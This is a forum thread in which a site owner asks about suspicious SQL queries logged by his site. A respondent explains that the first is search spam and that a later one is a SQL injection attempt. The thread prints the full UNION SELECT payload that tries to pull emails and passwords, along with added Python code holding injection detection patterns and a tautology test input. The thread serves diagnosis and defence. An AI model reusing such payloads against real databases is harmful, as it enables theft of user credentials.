ben_1uk Posted April 2, 2013

Hi everyone,

I'm hoping someone far more knowledgeable than myself can help out with an issue that has started over the last couple of weeks. I am receiving e-mails generated by my SQL database 'functions.php' file containing what looks to be the results of someone entering spurious search queries on one of my websites. I have included an example below:

SELECT p.page_title, p.page_url, COUNT(*) AS occurrences FROM search_page p, search_word w, search_occurrence o WHERE p.id = o.page AND w.id = o.word AND (w.word = 'xksvonbwfsnbudi' OR w.word = 'href=httpindianautoobservercomfemale' OR w.word = 'viagra' OR w.word = 'alternativea' OR w.word = 'wnwgpop' OR w.word = 'url=httpindianautoobservercomyang' OR w.word = 'mei' OR w.word = 'viagra' OR w.word = ''guangzhou'url' OR w.word = 'ehjwsjg' OR w.word = 'httpindianautoobservercom' OR w.word = 'viagra' OR w.word = 'prescription' OR w.word = 'jajfabw' OR w.word = 'href=httpwwwyaleacsorgbuy' OR w.word = 'viagra' OR w.word = 'interneta' OR w.word = 'hhjuxid' OR w.word = 'url=httpwwwyaleacsorghow' OR w.word = 'viagra' OR w.word = 'worksurl' OR w.word = 'kkwuvbc' OR w.word = 'httpwwwyaleacsorg' OR w.word = 'get' OR w.word = 'viagra' OR w.word = 'wxottqn' OR w.word = 'href=httpksign-mallcomwhat' OR w.word = 'metronidazole' OR w.word = 'used' OR w.word = 'for' OR w.word = 'dogsa' OR w.word = 'uthzket' OR w.word = 'url=httpksign-mallcommetronidazole' OR w.word = 'vaginal' OR w.word = 'gelurl' OR w.word = 'qajooff' OR w.word = 'httpksign-mallcom' OR w.word = 'metronidazole' OR w.word = 'dose' OR w.word = 'agdlvut' OR w.word = 'href=httpwwwmetacafecomchannelsjwannrichard' OR w.word = 'jeremiah' OR w.word = 'wanna' OR w.word = 'mpsswty' OR w.word = 'url=httpwwwmetacafecomchannelsjwannrichard' OR w.word = 'jeremiah' OR w.word = 'wannurl' OR w.word = 'qefwnsd' OR w.word = 'httpwwwmetacafecomchannelsjwann' OR w.word = 'richard' OR w.word = 'jeremiah' OR w.word = 'wann' OR w.word = 'svalyyw' OR w.word = 'href=httpgenf20-directcomgenf20' OR w.word = 'hgh' OR w.word = 'releasera' OR w.word = 'rttnfdx' OR w.word = 'url=httpgenf20-directcomgenf20url' OR w.word = 'egjipkc' OR w.word = 'httpgenf20-directcom' OR w.word = 'genf20' OR w.word = 'leading' OR w.word = 'edge' OR w.word = 'herbals' OR w.word = 'tlfsril' OR w.word = 'href=httphidecornetanyoption-reviewany' OR w.word = 'optiona' OR w.word = 'mvgfgum' OR w.word = 'url=httphidecornetanyoption-reviewanyoption' OR w.word = 'tradingurl' OR w.word = 'ovyjjoy' OR w.word = 'httphidecornetanyoption-review' OR w.word = 'anyoption' OR w.word = 'trading' OR w.word = 'vxwmsft') GROUP BY p.id ORDER BY occurrences DESC LIMIT 0 , 10

Can someone please explain what is going on here and, in layman's terms, what actions I need to take.

Many thanks in advance,
Ben1uk
requinix Posted April 2, 2013 (edited)

Looks like you strip out non-alphanumeric characters? Someone's botting your search page with spam, thinking it might be a kind of comment form or something. Is it causing a problem? Something you can just ignore? They'll leave once they realize they're not accomplishing anything.

Edited April 2, 2013 by requinix
ben_1uk (Author) Posted April 2, 2013

> Looks like you strip out non-alphanumeric characters? Someone's botting your search page with spam, thinking it might be a kind of comment form or something. Is it causing a problem? Something you can just ignore? They'll leave once they realize they're not accomplishing anything.

Hi requinix,

Thank you for the quick response. I've not had experience of anything like this before and, having spoken to somebody else about this, they mentioned that the below was an attempt to pull data from the database using the 'SELECT' command??? My primary concern is somebody being able to gain access to my SQL data or change the website in any way, shape or form. However, you state above 'they'll leave once they realize they're not accomplishing anything'. Are you saying the 'attack' is not anything to worry about? It has caused me a few sleepless nights over the Easter hols! Can you offer any more of an insight as to what is actually happening, or what the robot is attempting to achieve?
requinix Posted April 2, 2013

I'm saying it's not an attack. Look at what's in the query.

href=httpindianautoobservercomfemale
url=httpindianautoobservercomyang
httpksign-mallcom
trading

That's HTML and BBCode and straight up URLs and spam terms. For spam. They're spamming. SQL injection will have keywords like "SELECT" or pieces like "1=1".
ben_1uk (Author) Posted April 3, 2013

> I'm saying it's not an attack. Look at what's in the query.
>
> href=httpindianautoobservercomfemale
> url=httpindianautoobservercomyang
> httpksign-mallcom
> trading
>
> That's HTML and BBCode and straight up URLs and spam terms. For spam. They're spamming. SQL injection will have keywords like "SELECT" or pieces like "1=1".

Hi requinix,

Thanks again for your help and advice. However, the above example I posted originally did contain 'SELECT', but it doesn't appear to have been entered by the 'bot'. If I'm understanding it correctly (I'm new to PHP and SQL driven websites), the 'SELECT' command has been generated by the 'functions.php' file working on the database..? So long as my SQL database isn't at risk from this 'attack'...
requinix Posted April 3, 2013

... What you posted is way too specific to be actual input from a user. Also doesn't make sense to enter search terms like that when you can run arbitrary SQL. So that's the SQL generated by your site, which you are supposed to be familiar with, including information provided by the user. The spam information.

I can't know more about your site than you do but I can tell you with reasonable certainty that it was neither an attack nor was putting your site at risk.

With that said, go learn how your own site works.
ben_1uk (Author) Posted December 5, 2013

Hello again,

Following on from the above series of posts, I received a series of emails yesterday containing the below:

SELECT p.id as parentID, p.name as parentName, p.description, p.logo as parentLogo, p.parent, p.active FROM com_catalogue_category p LEFT JOIN com_catalogue_category c ON (c.id = p.parent) WHERE p.id = '56' and 5=6 union select concat(0x5E252421,ifnull(`id`,0x4E554C4C),char(9),ifnull(`email`,0x4E554C4C),char(9),ifnull(`password`,0x4E554C4C),char(9),0x2A5B7D2F),2 from `maver_user`.`users` where email like 0x25676F6F676C656D61696C2E25 limit 86,1 -- And '6'='6'

Can anyone please advise what is happening in the above example?

Thank you,
Ben_1uk
requinix Posted December 5, 2013

0x... is a way of getting a string into SQL without needing quotes.

mysql> SELECT 0x5E252421, 0x4E554C4C, 0x2A5B7D2F, 0x25676F6F676C656D61696C2E25 ;
+------------+------------+------------+------------------------------+
| 0x5E252421 | 0x4E554C4C | 0x2A5B7D2F | 0x25676F6F676C656D61696C2E25 |
+------------+------------+------------+------------------------------+
| ^%$!       | NULL       | *[}/       | %googlemail.%                |
+------------+------------+------------+------------------------------+

What they're doing there is trying to get IDs, emails, and passwords from the maver_user.users table. It's failing for a couple reasons: the number of fields doesn't match the rest of the query (6 in the first half, 1 in the second), and you probably don't have that table.

The SQL injection is with the 56 in

WHERE p.id = '56'
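To make that kind of triage repeatable when the next e-mail arrives, here is an added Python example (not code from the thread or from the site): it decodes every MySQL 0x hex literal the way the mysql session above does, rewrites the query with the literals spelled out, and flags the markers requinix points at (UNION SELECT, a trailing comment, a tautology, a users table). The sample is the injected tail of the query quoted in the thread.

```python
import re

# Constructed sample: the injected tail of the query quoted in the thread,
# as it would appear in the site's error e-mail.
LOGGED_QUERY = (
    "WHERE p.id = '56' and 5=6 union select concat(0x5E252421,"
    "ifnull(`id`,0x4E554C4C),char(9),ifnull(`email`,0x4E554C4C),char(9),"
    "ifnull(`password`,0x4E554C4C),char(9),0x2A5B7D2F),2 "
    "from `maver_user`.`users` where email like 0x25676F6F676C656D61696C2E25 "
    "limit 86,1 -- And '6'='6'"
)

# MySQL reads 0x... with an even number of hex digits as a binary string;
# that is how a string literal gets into the query without any quotes.
HEX_LITERAL = re.compile(r"\b0x([0-9A-Fa-f]+)\b")

def decode_hex_literals(sql):
    """Map each even-length 0x literal in sql to the text it encodes."""
    decoded = {}
    for match in HEX_LITERAL.finditer(sql):
        digits = match.group(1)
        if len(digits) % 2:        # odd length: MySQL treats it as a number
            continue
        decoded[match.group(0)] = bytes.fromhex(digits).decode("latin-1")
    return decoded

def expand_hex_literals(sql):
    """Return sql with each 0x string literal replaced by its quoted text."""
    def repl(match):
        digits = match.group(1)
        if len(digits) % 2:
            return match.group(0)
        return "'" + bytes.fromhex(digits).decode("latin-1") + "'"
    return HEX_LITERAL.sub(repl, sql)

# Patterns that mark an injection attempt rather than ordinary search spam.
INJECTION_MARKERS = {
    "union_select": re.compile(r"\bunion\b\s+(?:all\s+)?select\b", re.I),
    "comment_tail": re.compile(r"--\s|/\*"),
    "tautology": re.compile(r"\b(\d+)=\1\b|'(\w+)'='\2'"),
    "user_table": re.compile(r"\busers?\b", re.I),
}

def injection_markers(sql):
    """Names of the marker patterns present in sql, in dictionary order."""
    return [name for name, rx in INJECTION_MARKERS.items() if rx.search(sql)]
```

Run against a whole day of such e-mails, a non-empty marker list separates the December query from the April search spam, which trips none of them.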
ben_1uk (Author) Posted December 10, 2013

> 0x... is a way of getting a string into SQL without needing quotes.
>
> mysql> SELECT 0x5E252421, 0x4E554C4C, 0x2A5B7D2F, 0x25676F6F676C656D61696C2E25 ;
> +------------+------------+------------+------------------------------+
> | 0x5E252421 | 0x4E554C4C | 0x2A5B7D2F | 0x25676F6F676C656D61696C2E25 |
> +------------+------------+------------+------------------------------+
> | ^%$!       | NULL       | *[}/       | %googlemail.%                |
> +------------+------------+------------+------------------------------+
>
> What they're doing there is trying to get IDs, emails, and passwords from the maver_user.users table. It's failing for a couple reasons: the number of fields doesn't match the rest of the query (6 in the first half, 1 in the second), and you probably don't have that table.
>
> The SQL injection is with the 56 in
>
> WHERE p.id = '56'

Thank you for your response requinix,

Next question is what can I do to prevent this information falling into the wrong hands?
requinix Posted December 10, 2013

Fix the exploit.
ben_1uk (Author) Posted December 11, 2013

> Fix the exploit.

Well, obviously. However, I'm not much of a PHP buff so any further advice or links to further reading would be appreciated.

Thank you,
Ben_1uk
requinix Posted December 11, 2013

OWASP is a good place to start, like their Top Ten Project listing the worst flaws for web applications.
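Applied to the catalogue query in this thread, the fix looks like this. It is an added Python example (not the site's PHP and not OWASP's code) that uses sqlite3 in memory as a stand-in for MySQL: the vulnerable builder pastes the request value into the SQL text exactly as the logged query shows, the fixed builder binds it as a parameter, and a tautology of the '1'='1' kind requinix mentioned returns every row through the first and nothing through the second. The table and its two rows are constructed.

```python
import sqlite3

# Constructed stand-in for the site's com_catalogue_category table (two rows).
def make_db():
    db = sqlite3.connect(":memory:")
    db.execute(
        "CREATE TABLE com_catalogue_category ("
        "id INTEGER, name TEXT, description TEXT, logo TEXT, parent INTEGER, active INTEGER)"
    )
    db.executemany(
        "INSERT INTO com_catalogue_category VALUES (?, ?, ?, ?, ?, ?)",
        [(56, "Bikes", "two wheels", "bikes.png", 0, 1),
         (57, "Cars", "four wheels", "cars.png", 0, 1)],
    )
    return db

# The query from the thread, up to the value that came from the request.
BASE_QUERY = (
    "SELECT p.id AS parentID, p.name AS parentName, p.description, "
    "p.logo AS parentLogo, p.parent, p.active "
    "FROM com_catalogue_category p "
    "LEFT JOIN com_catalogue_category c ON (c.id = p.parent) "
    "WHERE p.id = "
)

def category_vulnerable(db, category_id):
    """The pattern behind the logged query: the request value becomes SQL text,
    so a quote in it ends the literal and whatever follows runs as SQL."""
    sql = BASE_QUERY + "'" + category_id + "'"
    return db.execute(sql).fetchall()

def category_fixed(db, category_id):
    """The fix: the value is bound as a parameter, so it can only ever be a
    value to compare against, never part of the statement."""
    return db.execute(BASE_QUERY + "?", (category_id,)).fetchall()

def demo():
    """Row counts for a normal id and for a tautology through both builders."""
    db = make_db()
    normal, attack = "56", "56' OR '1'='1"
    return {
        "vulnerable_normal": len(category_vulnerable(db, normal)),
        "vulnerable_attack": len(category_vulnerable(db, attack)),
        "fixed_normal": len(category_fixed(db, normal)),
        "fixed_attack": len(category_fixed(db, attack)),
    }
```

In PHP the same binding is what mysqli or PDO prepared statements give you; checking that the id is an integer before it reaches the query is a cheap second layer on top.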